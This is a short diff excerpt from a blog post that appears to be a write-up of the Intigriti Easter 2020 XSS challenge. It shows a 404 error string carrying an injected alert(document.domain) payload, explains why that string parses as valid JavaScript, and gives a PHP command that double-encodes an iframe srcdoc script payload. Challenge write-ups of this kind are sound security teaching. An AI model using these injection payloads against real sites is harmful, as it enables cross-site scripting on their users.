lboynton/lboynton.github.io/_posts/2020-04-20-intigriti-easter-xss-challenge-2020-write-up.md

 404 - 'File "';alert(document.domain);'" was not found in this folder.'
 ```

+This is valid because `404 - 'File "'` is valid JavaScript, even though it's a string being subtracted from an integer.
+The next part is the alert, and the last part is just a string, which does not need to be assigned to anything to be valid.
 My next attempt was as follows:

 ```
 php > echo rawurlencode(rawurlencode('<iframe srcdoc="<script src=/\';alert(document.domain);\'></script>"></iframe>'));